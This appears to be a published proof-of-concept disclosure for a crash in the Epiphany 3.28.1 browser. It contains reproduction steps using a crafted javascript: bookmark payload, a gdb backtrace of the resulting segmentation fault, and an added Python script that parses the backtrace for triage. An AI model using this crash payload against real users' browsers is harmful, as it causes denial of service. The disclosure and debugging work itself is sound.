"Epiphany Web Browser 3.28.1 - Denial of Service (PoC)"

Author: Dhiraj Mishra
Platform: linux
Release date: 2018-08-23

# Exploit Title: Epiphany Web Browser 3.28.1 - Denial of Service (PoC)
# Author: Dhiraj Mishra
# Date: 2018-08-23
# Software: https://projects-old.gnome.org/epiphany/
# Version: 3.28.1
# CVE: N/A
# Tested on: Ubuntu 18 64bit

# Steps to reproduce:
1. Open epiphany browser
2. Bookmark any random page
3. Then navigate to the bookmark properties and set:
    Name = Crash
    Address = javascript:window.open('javascript:document.write("<script></script>");');
4. Browse to any URL and try to open the above bookmark
5. The browser crashes

# Backtrace for reference:

$ gdb epiphany
GNU gdb (Ubuntu 8.1-0ubuntu3) 8.1.0.20180409-git
Copyright (C) 2018 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from epiphany...(no debugging symbols found)...done.
(gdb) r
Starting program: /usr/bin/epiphany 
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
[New Thread 0x7fffe08b6700 (LWP 9295)]
[New Thread 0x7fffdee4b700 (LWP 9296)]
[New Thread 0x7fffde64a700 (LWP 9297)]
[New Thread 0x7fffdcdcf700 (LWP 9298)]
[New Thread 0x7fff8fffd700 (LWP 9299)]
[New Thread 0x7fff8f7fc700 (LWP 9300)]
[New Thread 0x7fff8effb700 (LWP 9301)]
[New Thread 0x7fff8e38b700 (LWP 9302)]
[New Thread 0x7fff8db8a700 (LWP 9303)]
[New Thread 0x7fff8d389700 (LWP 9305)]
[New Thread 0x7fff77b0a700 (LWP 9310)]
[New Thread 0x7fff7598c700 (LWP 9320)]
[New Thread 0x7fff7518b700 (LWP 9321)]
[New Thread 0x7fff7498a700 (LWP 9327)]
[New Thread 0x7fff7698c700 (LWP 9334)]
[New Thread 0x7fff5ffff700 (LWP 9335)]
[New Thread 0x7fff5f7fe700 (LWP 9336)]
[New Thread 0x7fff5effd700 (LWP 9337)]
[New Thread 0x7fff5e7fc700 (LWP 9338)]
[New Thread 0x7fff5dffb700 (LWP 9339)]
[Thread 0x7fff8db8a700 (LWP 9303) exited]
[Thread 0x7fff8e38b700 (LWP 9302) exited]
[Thread 0x7fff5e7fc700 (LWP 9338) exited]
[Thread 0x7fff7698c700 (LWP 9334) exited]
[Thread 0x7fff5f7fe700 (LWP 9336) exited]
[Thread 0x7fff5effd700 (LWP 9337) exited]
[Thread 0x7fff5dffb700 (LWP 9339) exited]
[Thread 0x7fff5ffff700 (LWP 9335) exited]
Error scanning plugin /usr/lib/mozilla/plugins/libpepflashplayer.so, /usr/lib/x86_64-linux-gnu/webkit2gtk-4.0/WebKitPluginProcess returned 256 exit status
[New Thread 0x7fff5ffff700 (LWP 9399)]
[Thread 0x7fff7498a700 (LWP 9327) exited]
[New Thread 0x7fff7498a700 (LWP 9402)]
[Thread 0x7fff7498a700 (LWP 9402) exited]

Thread 22 "pool" received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0x7fff5ffff700 (LWP 9399)]
0x00007ffff7b75db7 in ?? () from /usr/lib/x86_64-linux-gnu/epiphany-browser/libephymain.so
(gdb) bt
#0  0x00007ffff7b75db7 in  () at /usr/lib/x86_64-linux-gnu/epiphany-browser/libephymain.so
#1  0x00007ffff7079be6 in  () at /usr/lib/x86_64-linux-gnu/libgio-2.0.so.0
#2  0x00007ffff73fe7d0 in  () at /usr/lib/x86_64-linux-gnu/libglib-2.0.so.0
#3  0x00007ffff73fde05 in  () at /usr/lib/x86_64-linux-gnu/libglib-2.0.so.0
#4  0x00007fffefc206db in start_thread (arg=0x7fff5ffff700) at pthread_create.c:463
#5  0x00007ffff5e4c88f in clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S:95
(gdb)
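
The backtrace above has no symbols for its first four frames, so the first triage step is to establish which module faulted and which libraries need debug symbols before the crash is reported. The following Python is an added example, not part of the original PoC; it parses the `bt` frames copied from this page, and the function names `parse_frames` and `triage` are this example's own.

```python
import re

# Frames copied verbatim from the backtrace on this page.
BACKTRACE = """\
#0  0x00007ffff7b75db7 in  () at /usr/lib/x86_64-linux-gnu/epiphany-browser/libephymain.so
#1  0x00007ffff7079be6 in  () at /usr/lib/x86_64-linux-gnu/libgio-2.0.so.0
#2  0x00007ffff73fe7d0 in  () at /usr/lib/x86_64-linux-gnu/libglib-2.0.so.0
#3  0x00007ffff73fde05 in  () at /usr/lib/x86_64-linux-gnu/libglib-2.0.so.0
#4  0x00007fffefc206db in start_thread (arg=0x7fff5ffff700) at pthread_create.c:463
#5  0x00007ffff5e4c88f in clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S:95
"""

# One gdb frame: "#N  0xPC in [func] (args) at|from <module or source:line>"
FRAME_RE = re.compile(
    r"^#(?P<idx>\d+)\s+(?P<pc>0x[0-9a-f]+) in\s+(?P<func>[^\s(]*)\s*"
    r"\((?P<args>[^)]*)\)\s+(?:at|from)\s+(?P<where>\S+)\s*$",
    re.MULTILINE,
)

def parse_frames(text):
    """Return one dict per gdb 'bt' frame; func is None when gdb had no symbol."""
    frames = []
    for m in FRAME_RE.finditer(text):
        leaf = m["where"].rsplit("/", 1)[-1]
        is_module = ".so" in leaf          # shared object, as opposed to source:line
        frames.append({
            "idx": int(m["idx"]),
            "pc": int(m["pc"], 16),
            "func": m["func"] if m["func"] not in ("", "??") else None,
            "module": leaf if is_module else None,
            "source": None if is_module else m["where"],
        })
    return frames

def triage(frames):
    """Summarise where the fault sits and which modules still need debug symbols."""
    unresolved = [f for f in frames if f["func"] is None]
    return {
        "faulting_module": frames[0]["module"],
        "faulting_pc": hex(frames[0]["pc"]),
        "needs_symbols": sorted({f["module"] for f in unresolved if f["module"]}),
        # Outermost caller first, so the chain reads in execution order.
        "call_chain": [f["func"] or f["module"] for f in reversed(frames)],
    }

if __name__ == "__main__":
    for key, value in triage(parse_frames(BACKTRACE)).items():
        print(f"{key}: {value}")
```

The resulting call chain runs from `clone` and `start_thread` through GLib and GIO into `libephymain.so`, so the fault is in Epiphany's own library on the worker thread gdb names "pool"; no WebKit library appears in the trace.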